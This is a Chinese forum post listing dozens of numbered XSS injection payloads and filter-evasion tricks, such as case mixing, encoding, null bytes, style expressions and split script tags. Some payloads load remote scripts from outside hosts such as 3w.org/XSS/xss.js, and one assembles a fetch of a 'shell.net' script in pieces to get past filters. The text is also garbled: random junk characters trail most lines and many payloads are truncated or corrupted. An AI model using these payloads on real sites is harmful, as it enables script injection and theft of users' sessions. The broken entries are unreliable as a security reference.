(1)普通的XSS JavaScript注入
& U% [6 m$ X$ s- d% \4 g8 a. D9 B<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 l, _9 \( m# u- P- M(99)另类弹框
g& z1 r: S H' f<q/oncut=alert()>1
2 b1 y. }8 y; H- q# ?<s/onclick=alert()>b6 @' y9 m! B, m2 x
<XSS=" onclick="alert(1)//">clickme</SSX=">
9 v+ l/ S: w+ S5 K <zzz onclick=alert`1`>clickme</zzz> : L+ d7 L; I' i* z' H6 M6 ~3 R
<a onclick=alert`1`>clickme</a>6 |4 ?" ~# T. |6 d+ `
<a=">clickme</a=">) q5 f4 |+ B/ p
<a=">clickme</a>
- i3 x5 o' a8 m<z=">clickme</z=">* F" ~' E2 |0 `7 J C$ I O! n( @
<z onclick=alert`1`>clickme</z>) R! a2 Q w! k5 O( y1 w: a: O( y
. i% A& y# A# f' P0 v& u
(2)IMG标签XSS使用JavaScript命令
8 x7 K5 |- j* \. q2 l! u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( v( x* p$ Y; o$ }9 r- u
: b, J- g3 s& `- U! E1 A(3)IMG标签无分号无引号
8 H+ y2 O+ x* [, L0 b: R<IMG SRC=javascript:alert(‘XSS’)>' B+ F w$ P* x0 B% p
( d6 X5 ~2 V; t P
(4)IMG标签大小写不敏感/ h8 y* W+ L2 }7 Z7 |$ Z* k8 }9 Z* v
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: w' k1 ~8 a: ?2 M
$ g' c4 C0 N/ \9 F(5)HTML编码(必须有分号)
+ G$ C: u8 T$ F5 o<IMG SRC=javascript:alert(“XSS”)>
+ n1 `' Z3 p1 U W% i4 d8 R! b& ~- r4 T. ?; r/ E- [
(6)修正缺陷IMG标签( P! H" x, ~% q/ a+ o( ?- g0 b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, A) U' c) x: Y
3 P3 U) A' [! |! o5 o, e2 Z& k! t
(7)formCharCode标签(计算器)9 j$ P/ t* d7 ]+ W
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 l: C8 h$ s( ~# x- P1 k9 T$ W
- U: x+ r1 Z0 W9 R5 t; _* v(8)UTF-8的Unicode编码(计算器)3 L0 A( L/ g+ b7 O
<IMG SRC=jav..省略..S')>0 J- ^7 f4 U: i6 F& j, F6 `/ O
; [ z# [, f4 v0 a(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) `$ W# v6 {1 _<IMG SRC=jav..省略..S')>
2 ~0 }6 h3 y7 y+ _6 f$ G% `% \: T, x1 h0 v! {& y
(10)十六进制编码也是没有分号(计算器)4 w- K* v+ ^( M) l
<IMG SRC=\'#\'" /span>; I8 G& T3 f5 h: j+ t$ x; `" S' D
, t7 a8 |" M! d* K(11)嵌入式标签,将Javascript分开
5 S0 S# D+ l+ H4 G( a$ h |<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>9 t, r/ C" d `. s! k1 y1 ^
- c% M8 f% {: Q3 A) _" n8 N" S(12)嵌入式编码标签,将Javascript分开+ Y4 }( n, @( g3 R+ }7 C# f
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
6 y0 s- R/ M: S/ J& K% u4 u( O9 ~# f
& v- ?5 z9 Z/ D8 K, k$ C- R(13)嵌入式换行符4 L* ]. c6 d5 T1 [" _0 T; |
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
! I2 e S. s, ]2 }) ^. c' J, }$ x2 T. D8 a- V2 x; J( Z5 [& K
(14)嵌入式回车
: @" j; G! S6 N+ y+ m<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& F, B1 u7 \! \" v
! J7 o) G3 j P; }' }( Z# G6 S: s(15)嵌入式多行注入JavaScript,这是XSS极端的例子
. y& m3 r; D& {; Z- A" \- {' C# V<IMG SRC=\'#\'" /span>
) P0 r: f1 c2 }2 ^
4 v. r& ~' q' n7 M2 H(16)解决限制字符(要求同页面)
$ h4 U- r0 I- J+ n* e<script>z=’document.’</script>1 d( r0 b. ]( y
<script>z=z+’write(“‘</script>
8 H, U/ F( U: P- T9 K8 H) v$ Y: ]<script>z=z+’<script’</script>
0 R1 R* @- h2 W# G& W( s$ U% O! g6 Y<script>z=z+’ src=ht’</script>: a' j/ v& i: |
<script>z=z+’tp://ww’</script>
- q% n7 a" `4 a0 y$ c/ {<script>z=z+’w.shell’</script>
8 _: G7 a6 Y7 g+ m7 G1 R<script>z=z+’.net/1.’</script>
& J# }. R2 ?3 s/ b5 Y<script>z=z+’js></sc’</script>+ n* X z/ p9 `8 w# w8 M" x
<script>z=z+’ript>”)’</script>
* U- C" M; A; v- H# {6 X; T<script>eval_r(z)</script>
: ]& d( @% p0 U& C. s
* V/ e0 Q; G8 g: C+ j(17)空字符# l5 x8 d( C+ t7 g; x: t9 L# l
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
0 M1 J7 K+ I# H" m( l( U' P: A
; Q4 A5 v J: f! S(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 `) f' q9 q1 y+ Q/ V8 [/ _0 i- H
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
8 V9 Z3 o" N9 i" p( X& n* k8 s( ~- Z/ u7 B! L( Z9 u0 N
(19)Spaces和meta前的IMG标签
+ J8 J V+ M" E. O9 t3 u<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>, h% ]* V& r/ z+ {9 L
9 i; E( y: G! \0 K3 A
(20)Non-alpha-non-digit XSS
- {2 z* r/ O. R$ x! c' k<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>( K6 d0 ^4 @ Y
. Q8 X \% t. K* B
(21)Non-alpha-non-digit XSS to 29 c, g1 P0 z% r4 N) _5 H1 G/ n: T
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: ]7 Y3 Q& Z8 G) I+ o @
$ Z% ]: w, T+ Z3 k" ]
(22)Non-alpha-non-digit XSS to 3
) N; t8 g2 I( d1 G1 S8 V8 w<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; l( R7 N9 d3 |4 L; U4 C1 i2 c
; Q, Y2 m6 W. M6 [. ?! ]8 W4 y(23)双开括号
! J' n+ I4 L1 R1 d. Y( s' u<<SCRIPT>alert(“XSS”);//<</SCRIPT>8 d+ T9 }" b3 ^6 C
8 R2 n2 R! X2 I8 ]* T
(24)无结束脚本标记(仅火狐等浏览器)6 K- c4 O" g5 m& |% A3 h1 {
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* k* B; Z' |' z4 L2 a, v
5 Q8 D5 H; }3 q(25)无结束脚本标记2
$ j& H! S/ [/ c ~; \/ X<SCRIPT SRC=//3w.org/XSS/xss.js>
1 u( C3 B; U: I- f, O# e1 i, ^$ p% G' D v* C/ o7 Q4 ~
(26)半开的HTML/JavaScript XSS
0 b f* n/ G, d: `<IMG SRC=\'#\'" /span>
) K" a, [- b' _4 s0 e7 e {
( q4 f6 V; ?3 Q7 a8 E/ o7 P(27)双开角括号/ T) x; D( c+ I$ d
<iframe src=http://3w.org/XSS.html <
8 N' j2 A0 X9 J6 d# I0 o0 f# s; z- h5 s' x( U# T: p1 G
(28)无单引号 双引号 分号
' `' p1 _1 k8 C- K9 g4 g3 }<SCRIPT>a=/XSS/! w, T9 ]1 G6 \" j% L) B4 h
alert(a.source)</SCRIPT>$ p5 a r; I! x
' L, W8 k2 _& e9 j( \! N(29)换码过滤的JavaScript% {0 A# s8 L6 c" o) ^
\”;alert(‘XSS’);//
+ F' c, A {' N+ R6 n5 H6 t6 S8 n O2 g$ a; v5 Z9 F3 I2 o$ f0 r \
(30)结束Title标签: t" G- i. Q" o" I7 S% k- D$ p8 K
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
Y. b! L4 q4 p3 x( d/ d( e% ^% t0 H0 ]0 y6 s# E0 D& w
(31)Input Image' b4 d7 s9 @: a1 ?0 G2 w: y3 b) c. k
<INPUT SRC=\'#\'" /span>- U* }+ j- j; |& L6 U. i" G
5 l% Y, v; v: y# S; W9 N) b
(32)BODY Image
4 J9 H# k! T, ~6 A9 T/ W- C<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 M" J. h' C& X7 G' Y0 o* Y8 g* `9 ?1 ~' F2 T
(33)BODY标签+ J' C7 q6 I& b4 _' v; J; Y$ D
<BODY(‘XSS’)>
1 L3 v1 d' o' D. X+ O' v8 Z( n& o, Y0 p! L- y- n, d2 L# e _$ a
(34)IMG Dynsrc+ _, E! C% L$ i$ K
<IMG DYNSRC=\'#\'" /span>" H9 u0 T( X! I9 C1 v9 J
; X5 V; m! r4 J+ D. c(35)IMG Lowsrc
) w7 v% I& D2 O6 b2 V<IMG LOWSRC=\'#\'" /span> G- [" O/ H& J a: O0 r5 C$ u" S
G! `* o# {: Y. T5 j# V(36)BGSOUND6 n3 P% ~% H' B7 Y. E% e$ q
<BGSOUND SRC=\'#\'" /span>6 K8 c1 Q; a6 p8 i3 u' h
" Q5 B% B0 c+ B(37)STYLE sheet' W2 _% b# ]) u9 e' I1 C# z
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>: Y j# \5 k& Z5 e' g
0 ^* ]( w6 u" W& B( F) r(38)远程样式表
8 q! F4 f+ n7 v0 z<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>: K) I+ `2 @, |* C, [) L5 R- g4 d
" A1 U$ }5 n8 K6 u' G5 Q(39)List-style-image(列表式)
9 W3 x2 c: ~ [* Y; @9 `: a<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS; m7 K0 E$ |4 s# w9 _/ S
+ G' k2 L/ `. C/ Z7 V; j(40)IMG VBscript
# a3 ~5 c8 k% Y. k6 }: u" I<IMG SRC=\'#\'" /STYLE><UL><LI>XSS. n; u% t0 @9 Z! e2 I: ?0 K) q
( f3 b, F: U; e$ \- h3 ^4 B( C+ u
(41)META链接url
3 {: Q9 R! a0 a! I" ?* l<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 r- G: K0 V; r& K* d' g
- v2 ?4 @6 u9 V3 G3 _, _9 _
(42)Iframe
' t( u$ U5 j6 ]; y<IFRAME SRC=\'#\'" /IFRAME>
. E) o- ^4 B E. a+ o+ Y& F1 L& I4 Q; z8 H$ D9 I) l
(43)Frame
: D, a5 S# z2 a<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>, ]& V7 Q D% Q6 D" }. y: |
) Z l$ @" P7 j" b0 \. ], ?; v
(44)Table
( n) U4 F8 n9 R<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>' M" V x7 g, \% j& F
, w( L% Q' o& e
(45)TD
5 i/ R6 V8 W7 P/ @; t' c/ @ X<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 a0 C3 c, H) B: p$ h- ?, M. y
3 q" h* I3 A& }* ]3 C9 ~
(46)DIV background-image
1 V5 t3 O$ H0 r7 z5 K<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 n% w& ]) N- S& K7 ]" e; O3 G
5 J* y: X! E: e/ R7 e( p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, Q/ ~! \$ V, q<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
1 w# ]* Q$ d/ [7 x3 W( ?9 |
/ K! x) } r' l* s$ S(48)DIV expression6 `+ j) O, j$ L; ]9 R
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ {6 V; f( E. N+ S9 X; E, V; X. p) `) I+ S3 x
(49)STYLE属性分拆表达
4 e V$ }% S* w X1 ?<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( c$ x S [7 I# `
/ ~0 I" t9 j% D L. }, a(50)匿名STYLE(组成:开角号和一个字母开头)0 n" H( Q# Y4 Q' ^2 x* K9 Y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, P; M' R4 u& G- K$ t- e/ J* G
* U: t& g" q1 B8 P! }- e$ z3 o; W( x(51)STYLE background-image# I3 j7 W! M# o8 A x7 u+ f; S
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>; [9 g6 C4 v7 h' t6 H+ P
& k& D" ~* o, `8 U2 `5 ~(52)IMG STYLE方式6 w. r6 u# v3 Y/ d4 a- ?. t, E& ~
exppression(alert(“XSS”))’>2 G @( c. j+ f. Z/ h
4 q( r( W* U+ T7 y9 q# @
(53)STYLE background
0 }( @6 J8 X6 L2 J7 R; A<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ C7 W2 X7 H: p& `4 C
$ u, G% U' [+ U/ e# j" Z(54)BASE/ m; a3 B1 p! ^& Y0 T4 Z. v
<BASE HREF=”javascript:alert(‘XSS’);//”>
1 [. d# h3 {: j( C# t- ~3 \8 ?+ Y }$ o, H: H: J; M) [, A# G. x9 t
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! k4 a* y, n8 I$ w t5 j<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED># ]- l2 v8 e$ [5 w
|
发表于 2016-4-28 10:06:15
收藏
支持
反对